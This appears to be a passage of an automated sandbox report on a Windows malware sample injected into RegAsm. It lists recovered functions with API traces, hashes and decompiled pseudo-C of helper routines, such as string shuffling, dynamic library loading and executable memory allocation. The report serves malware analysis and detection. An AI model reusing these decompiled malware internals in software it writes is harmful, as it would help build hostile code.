Instruction ID: 6b72621b414fe2b0301426ebb88ecc75a24bc0652ca9a6a802ee6912e0baea24
Opcode Fuzzy Hash: 6f4d0c67dea5f1b3f38bc36e9e72f413d11ff3e9ef564c951b1dae2b6248ab30
Instruction Fuzzy Hash: 588128B5D1022ADFCF11DFA4D88499DBBB9BF08710F14806AE409EB254D7719951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F1D7DD, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,03F1CAA3,00000000,?,?,?,03F1CAA3,?,?,?,?,?), ref: 03F1D81B
lstrlen.KERNEL32(03F1CAA3,?,?,?,03F1CAA3,?,?,?,?,?), ref: 03F1D839
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 03F1D8A8
lstrlen.KERNEL32(03F1CAA3,00000000,00000000,?,?,?,03F1CAA3,?,?,?,?,?), ref: 03F1D8C9
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 03F1D8DD
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 03F1D8E6
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 03F1D8F4

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 8a509a956ad4d1909a96caa1c70f045c6ce762d42f53ada36f0465686cd6d13a
Instruction ID: 78997b5dee7a90459aca00d57f65cbbb49e06867c160a0e995275ebdfe52e399
Opcode Fuzzy Hash: 8a509a956ad4d1909a96caa1c70f045c6ce762d42f53ada36f0465686cd6d13a
Instruction Fuzzy Hash: 6341D77680021AEFDF11EF65ED4589A7FA8EF143A4B054525FC18A6260E771DE608BE0

Uniqueness

Uniqueness Score: -1.00%

Function 010A69CC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E010A69CC(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x10aa37c; // 0x3409630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x10aa37c; // 0x3409630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x10aa030) {
					HeapFree( *0x10aa290, 0, _t8);
				}
				_t13[1] = E010A1BBE(_v0, _t13);
				_t10 =  *0x10aa37c; // 0x3409630
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x010a69cc
0x010a69cc
0x010a69d5
0x010a69e5
0x010a69e5
0x010a69ea
0x010a69ef
0x00000000
0x00000000
0x010a69df
0x010a69df
0x010a69f1
0x010a69f5
0x010a6a07
0x010a6a07
0x010a6a17
0x010a6a1a
0x010a6a1f
0x010a6a23
0x010a6a29

APIs

RtlEnterCriticalSection.NTDLL(034095F0), ref: 010A69D5
Sleep.KERNEL32(0000000A,?,00000000), ref: 010A69DF
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010A6A07
RtlLeaveCriticalSection.NTDLL(034095F0), ref: 010A6A23

Strings

Ut, xrefs: 010A6A07

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 47729e1d4cb61b9e7f83fdb7c9b17430b32022ebbf831630062eee81e0d988da
Instruction ID: 41090821a286f0d182c1415c8d92922064f4ba627b19ea53bb845c3c90b1b1e4
Opcode Fuzzy Hash: 47729e1d4cb61b9e7f83fdb7c9b17430b32022ebbf831630062eee81e0d988da
Instruction Fuzzy Hash: 5EF03472340A50DFEB31DFA9E848F4A7BB8AB14784B89C040F5D6C7299C23AD800CB20

Uniqueness

Uniqueness Score: -1.00%

Function 010A1A44, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E010A1A44() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x10aa37c; // 0x3409630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x10aa37c; // 0x3409630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x10aa37c; // 0x3409630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x10ab85e) {
					HeapFree( *0x10aa290, 0, _t10);
					_t7 =  *0x10aa37c; // 0x3409630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x010a1a44
0x010a1a4d
0x010a1a5d
0x010a1a5d
0x010a1a62
0x010a1a67
0x00000000
0x00000000
0x010a1a57
0x010a1a57
0x010a1a69
0x010a1a6e
0x010a1a72
0x010a1a85
0x010a1a8b
0x010a1a8b
0x010a1a94
0x010a1a96
0x010a1a9a
0x010a1aa0

APIs

RtlEnterCriticalSection.NTDLL(034095F0), ref: 010A1A4D
Sleep.KERNEL32(0000000A,?,00000000), ref: 010A1A57
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 010A1A85
RtlLeaveCriticalSection.NTDLL(034095F0), ref: 010A1A9A

Strings

Ut, xrefs: 010A1A85

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: f61970481cd0d54b25e3da9a4a6aa94de2123cfea08223615e2c21c1a3e85671
Instruction ID: 735ec6384f6d46c3b5fad729377b0a4ba0a1fb849ca3dd573c9ee01d1d36f38d
Opcode Fuzzy Hash: f61970481cd0d54b25e3da9a4a6aa94de2123cfea08223615e2c21c1a3e85671
Instruction Fuzzy Hash: F4F05EB5340A00DFEB29CFA8D859F2577E5AB08780F81C049F982C7394C77AA800CB10

Uniqueness

Uniqueness Score: -1.00%

Function 03F19D5F, Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F1EA7C: ExpandEnvironmentStringsW.KERNEL32(74B606E0,00000000,00000000,74B606E0,?,80000001,03F19D7E,?,74B606E0,?,?,?,03F0F54C,?), ref: 03F1EA8D
Part of subcall function 03F1EA7C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,03F0F54C,?), ref: 03F1EAAA

lstrlenW.KERNEL32(?,00000000,?,80000001,?,74B606E0,?,?,?,03F0F54C,?), ref: 03F19DAB
lstrlenW.KERNEL32(00000008,?,?,?,03F0F54C,?), ref: 03F19DB2
lstrlenW.KERNEL32(?,?,?,?,?,03F0F54C,?), ref: 03F19DD0
lstrlen.KERNEL32(00000000,?,00000000), ref: 03F19E8E
lstrlenW.KERNEL32(?), ref: 03F19E99
wsprintfA.USER32 ref: 03F19EDB

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,03F19EF0,00000000,03F19EF1,00000080,00000000,00000000,03F24E08,74E069A0,03F19EF0,?), ref: 03F17461
Part of subcall function 03F17420: GetLastError.KERNEL32 ref: 03F1746B
Part of subcall function 03F17420: WaitForSingleObject.KERNEL32(000000C8), ref: 03F17490
Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 03F174B1
Part of subcall function 03F17420: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03F174D9
Part of subcall function 03F17420: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 03F174EE
Part of subcall function 03F17420: SetEndOfFile.KERNEL32(00000001), ref: 03F174FB
Part of subcall function 03F17420: CloseHandle.KERNEL32(00000001), ref: 03F17513

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
String ID:
API String ID: 1727939831-0
Opcode ID: dae97a654fe2e25dd3ca470aa99ea6bb7a62d39309c14e4feaa142ab8b3406b5
Instruction ID: 1babca2514091fb65082fd370efa08742d482da31c9dd6855cdfc55117b65b12
Opcode Fuzzy Hash: dae97a654fe2e25dd3ca470aa99ea6bb7a62d39309c14e4feaa142ab8b3406b5
Instruction Fuzzy Hash: A2515E7590020AFFDF11EFA9DC54DAEBBB9EF44204F148025E914EB250DB35DA21AF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1AFF1, Relevance: 7.7, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,03F0AAC3,00000010,?,?,?,?,?,?,?,?,?,?,03F12CF5,00000000,00000000), ref: 03F1B042
memcpy.NTDLL(00000000,00000000,03F0AAC3,0000011F), ref: 03F1B0D5
GetLastError.KERNEL32(?,?,0000011F), ref: 03F1B12D
GetLastError.KERNEL32 ref: 03F1B15F
GetLastError.KERNEL32 ref: 03F1B173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,03F12CF5,00000000,00000000,03F0AAC3,03F0422A,03F0AAC3), ref: 03F1B188

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLast$memcpy
String ID:
API String ID: 2760375183-0
Opcode ID: c73cc0f1228c271c5a304c408189e7aa8aea5c21012e30d8008394be89983146
Instruction ID: c87dac5312e95941bc27eb0fe63ca8bd3eeeee844c60a87ef05c0035c084cc30
Opcode Fuzzy Hash: c73cc0f1228c271c5a304c408189e7aa8aea5c21012e30d8008394be89983146
Instruction Fuzzy Hash: BE514DB2900209FFDB20DFA5EC84AAEBBB8FB14350F158425F911E6250D7759E60DB21

Uniqueness

Uniqueness Score: -1.00%

Function 03F1511E, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

lstrcpy.KERNEL32(?,00000020), ref: 03F1521B
lstrcat.KERNEL32(?,00000020), ref: 03F15230
lstrcmp.KERNEL32(00000000,?), ref: 03F15247
lstrlen.KERNEL32(?), ref: 03F1526B

Strings

, xrefs: 03F151B4

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 87c12b6c2c447e090214442bec2c8c5de1d49f719be39b08789895071ce0ed90
Instruction ID: 698998e392072ece848d72d1335c368e51fa2e18392b30a439564690b0e787bc
Opcode Fuzzy Hash: 87c12b6c2c447e090214442bec2c8c5de1d49f719be39b08789895071ce0ed90
Instruction Fuzzy Hash: E7516232E00259EFDF21CF99D8846ADFBB5FF96314F19805AE819AB211C7709661CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010A43E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E010A43E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E010A4573(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E010A2625(_v16);
								goto L37;
							}
							_t103 = E010A4573((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x10aa2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x010a43ed
0x010a43f4
0x010a43f9
0x010a43fc
0x010a4403
0x010a4406
0x010a4409
0x010a4410
0x010a4413
0x010a4567
0x010a4569
0x010a456b
0x010a4570
0x010a4570
0x010a4419
0x010a441c
0x010a441f
0x010a4421
0x010a4421
0x010a4425
0x00000000
0x00000000
0x010a4429
0x010a4455
0x010a445a
0x010a445c
0x010a445c
0x010a445f
0x010a4462
0x010a4462
0x010a4464
0x00000000
0x010a442f
0x010a4431
0x010a4450
0x010a4450
0x010a4467
0x010a4467
0x010a4468
0x010a4468
0x010a446b
0x00000000
0x00000000
0x00000000
0x010a446b
0x010a4435
0x010a447c
0x010a4480
0x010a455a
0x010a455c
0x010a455c
0x010a455d
0x010a4560
0x00000000
0x010a4560
0x010a449a
0x010a449e
0x010a4556
0x00000000
0x010a4556
0x010a44a4
0x010a44a7
0x010a44ab
0x010a44b1
0x010a44b4
0x010a454c
0x010a454c
0x00000000
0x010a4552
0x010a44bf
0x010a44c8
0x010a44dc
0x010a44e3
0x010a44f8
0x010a44fe
0x010a4506
0x00000000
0x00000000
0x00000000
0x00000000
0x010a4508
0x010a4508
0x010a4508
0x010a450f
0x010a4517
0x00000000
0x00000000
0x010a4519
0x010a4522
0x00000000
0x00000000
0x00000000
0x010a4524
0x010a4526
0x010a4529
0x010a4529
0x010a452c
0x010a4530
0x010a4533
0x010a4539
0x010a453c
0x010a4543
0x00000000
0x010a44bf
0x010a443a
0x010a4445
0x010a4448
0x010a444a
0x010a444a
0x010a444d
0x010a444f
0x00000000
0x010a444f
0x010a4429
0x010a446f
0x010a4474
0x010a4476
0x010a4476
0x010a4479
0x010a4479
0x00000000

APIs

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

lstrcpy.KERNEL32(69B25F45,00000020), ref: 010A44E3
lstrcat.KERNEL32(69B25F45,00000020), ref: 010A44F8
lstrcmp.KERNEL32(00000000,69B25F45), ref: 010A450F
lstrlen.KERNEL32(69B25F45), ref: 010A4533

Strings

, xrefs: 010A447C

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: b3973aa1964c315a43d11d7c58d3e4c2976c198146eb9a6e2dcad6bcb3711355
Instruction ID: 21cc60d1f7364c81644f23303ff3c9cd966b21fa2c6cd758b3262194284376ab
Opcode Fuzzy Hash: b3973aa1964c315a43d11d7c58d3e4c2976c198146eb9a6e2dcad6bcb3711355
Instruction Fuzzy Hash: 0C518F35A00118EFDF21CFEDC444AADBBB6EF45355F998096E995DB202C7B09A41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D98E, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,03F253D3,043A99A0,00000057), ref: 03F0D9B0
lstrlenW.KERNEL32(?,03F253D3,043A99A0,00000057), ref: 03F0D9C1
lstrlenW.KERNEL32(?,03F253D3,043A99A0,00000057), ref: 03F0D9D3
lstrlenW.KERNEL32(?,03F253D3,043A99A0,00000057), ref: 03F0D9E5
lstrlenW.KERNEL32(?,03F253D3,043A99A0,00000057), ref: 03F0D9F7
lstrlenW.KERNEL32(?,03F253D3,043A99A0,00000057), ref: 03F0DA03

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 58ce1da80c0bc23112eea5406c0949d13073abdaed75f84c1011bd5677655a2a
Instruction ID: 83be2437adf5152abd6928a694ce01c5e9ef22a76894da8bf8e91c6e430ac1f0
Opcode Fuzzy Hash: 58ce1da80c0bc23112eea5406c0949d13073abdaed75f84c1011bd5677655a2a
Instruction Fuzzy Hash: 26411F71E0020AEFCB20DFEDC880A6EF7F9BF94204B18856DE555E7251E774E9059B50

Uniqueness

Uniqueness Score: -1.00%

Function 03F082A6, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03F156F2: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 03F156FE
Part of subcall function 03F156F2: SetLastError.KERNEL32(000000B7,?,03F082BA), ref: 03F1570F

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F082DA
CloseHandle.KERNEL32(00000000), ref: 03F083B2

Part of subcall function 03F06032: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03F0604C
Part of subcall function 03F06032: CreateWaitableTimerA.KERNEL32(03F2C1A8,?,?), ref: 03F06069
Part of subcall function 03F06032: GetLastError.KERNEL32(?,?), ref: 03F0607A
Part of subcall function 03F06032: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 03F060BA
Part of subcall function 03F06032: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 03F060D9
Part of subcall function 03F06032: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 03F060EF

GetLastError.KERNEL32 ref: 03F0839B
ReleaseMutex.KERNEL32(00000000), ref: 03F083A4

Part of subcall function 03F156F2: CreateMutexA.KERNEL32(03F2C1A8,00000000,?,?,03F082BA), ref: 03F15722

GetLastError.KERNEL32 ref: 03F083BF

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: d327c263af4a4c3f0747ce412a0bf16acde9000b183f698d533c37258a03fdbc
Instruction ID: 7d15daf930386b8c03ebf0bbad239754bc8c481d8ab5680f3c8e2b06dc493f7f
Opcode Fuzzy Hash: d327c263af4a4c3f0747ce412a0bf16acde9000b183f698d533c37258a03fdbc
Instruction Fuzzy Hash: 7731AE75A00209DBCB20EF79ECA486EBBB9FF993907180426E845D73A0DB718810DF60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0B469, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 03F0B482

Part of subcall function 03F199FB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03F04D64), ref: 03F19A21

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,03F090F9,00000000), ref: 03F0B4C4
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 03F0B516
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,03F090F9,00000000), ref: 03F0B52F

Part of subcall function 03F0861E: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03F0863F
Part of subcall function 03F0861E: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,03F0B4B5,00000000,00000000,00000000,00000001,?,00000000), ref: 03F08682

GetLastError.KERNEL32(?,00000000,03F090F9,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F0B567

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: c1ef195389df4f682ac798effa9558c600a4671c6be9e681b6f46df43f0771aa
Instruction ID: d9aa3fee3504715ebdeac34d51f1e17c8bbb2b60e59d5279d54fad36cd661990
Opcode Fuzzy Hash: c1ef195389df4f682ac798effa9558c600a4671c6be9e681b6f46df43f0771aa
Instruction Fuzzy Hash: CF311B75A00209EFDB25EFD9D850AAE7BB9EF08750F0440A5E905EB298D774DE40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1026C, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 03F102EE
lstrcpy.KERNEL32(00000000,?), ref: 03F10307
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 03F10314
lstrlen.KERNEL32(03F2D3A4,?,?,?,?,?,00000000,00000000,?), ref: 03F10326
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 03F10357

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: 5af2b86f8972d2f142b5e7c77cd41fcc19670d89df325c670da04d124907336a
Instruction ID: 7852df056d1ea20ed423344487dbda523f2d13107cd67d0474b68efa048af643
Opcode Fuzzy Hash: 5af2b86f8972d2f142b5e7c77cd41fcc19670d89df325c670da04d124907336a
Instruction Fuzzy Hash: 94317C3290020AEFDB21EF95DC48EEEBBB8FF55310F048024F91496250EB74EA61DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1AC49, Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F11C6B: RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F11C73
Part of subcall function 03F11C6B: RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F11C88
Part of subcall function 03F11C6B: InterlockedIncrement.KERNEL32(0000001C), ref: 03F11CA1

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03F1AC80
memcpy.NTDLL(00000000,?,?), ref: 03F1AC91
lstrcmpi.KERNEL32(00000002,?), ref: 03F1ACD7
memcpy.NTDLL(00000000,?,?), ref: 03F1ACEB
HeapFree.KERNEL32(00000000,00000000,?), ref: 03F1AD31

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 733514052-0
Opcode ID: 7cab86cd9efb7ec5b33be0855a0854963858bedce1eca7710c58c8c87772b3fb
Instruction ID: 0df759f8c162c655731340f4a10b3905b9c2e152aa454ee8b356d2a6cf229428
Opcode Fuzzy Hash: 7cab86cd9efb7ec5b33be0855a0854963858bedce1eca7710c58c8c87772b3fb
Instruction Fuzzy Hash: 7031BF7290021AEFCF21EFA8EC94AAE7BB8FF14215F144028E905E7210E735DD60CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C317, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,03F148F1,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1C337
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C34C
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C368
GetProcAddress.KERNEL32(00000000,?), ref: 03F1C37D
GetProcAddress.KERNEL32(00000000,?), ref: 03F1C391

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$AddressProc
String ID:
API String ID: 1469910268-0
Opcode ID: 09dc27645a1718239f0433d779c78b019b0014ab9a33b0b3770ce797ee21ec54
Instruction ID: 40d2eb5f01b8319cce966f5e67bc2f5a83f6e0745d9263cb126c2dea21ea5ea8
Opcode Fuzzy Hash: 09dc27645a1718239f0433d779c78b019b0014ab9a33b0b3770ce797ee21ec54
Instruction Fuzzy Hash: C4319136640619CFC720EFA8E8A1E5973E8FB1D714B040269EA09CB319D774E8428B50

Uniqueness

Uniqueness Score: -1.00%

Function 03F056F6, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 03F03288: lstrlen.KERNEL32(?,?,?,?,03F0AA7F,00000000,00000000,?,?), ref: 03F03294

RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F05720
